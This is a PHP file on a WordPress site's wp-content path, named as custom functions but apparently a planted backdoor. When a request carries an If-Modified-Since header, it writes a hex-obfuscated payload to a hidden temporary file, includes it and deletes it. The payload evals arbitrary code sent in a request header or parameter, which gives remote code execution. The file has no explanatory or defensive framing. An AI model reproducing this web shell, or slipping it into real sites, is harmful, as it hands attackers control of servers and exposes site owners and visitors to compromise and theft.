/home/cp181240/www/grillshack/wp-content/custom-functions-1724456177.php
<!--kQKmevqo-->
<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['If-Modified-Since'])) {
    $c = "\x3c\x3f\x70\x68p\x20@\x65v\x61l\x28$\x5fH\x45A\x44E\x52S\x5b\"\x49f\x2dU\x6em\x6f\x64\x69\x66\x69\x65\x64\x2d\x53\x69\x6e\x63\x65\x22\x5d\x29\x3b\x40\x65\x76\x61\x6c\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x22\x49\x66\x2d\x55\x6e\x6d\x6f\x64\x69\x66\x69\x65\x64\x2d\x53\x69\x6e\x63\x65\x22\x5d\x29\x3b";
    $f = '.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}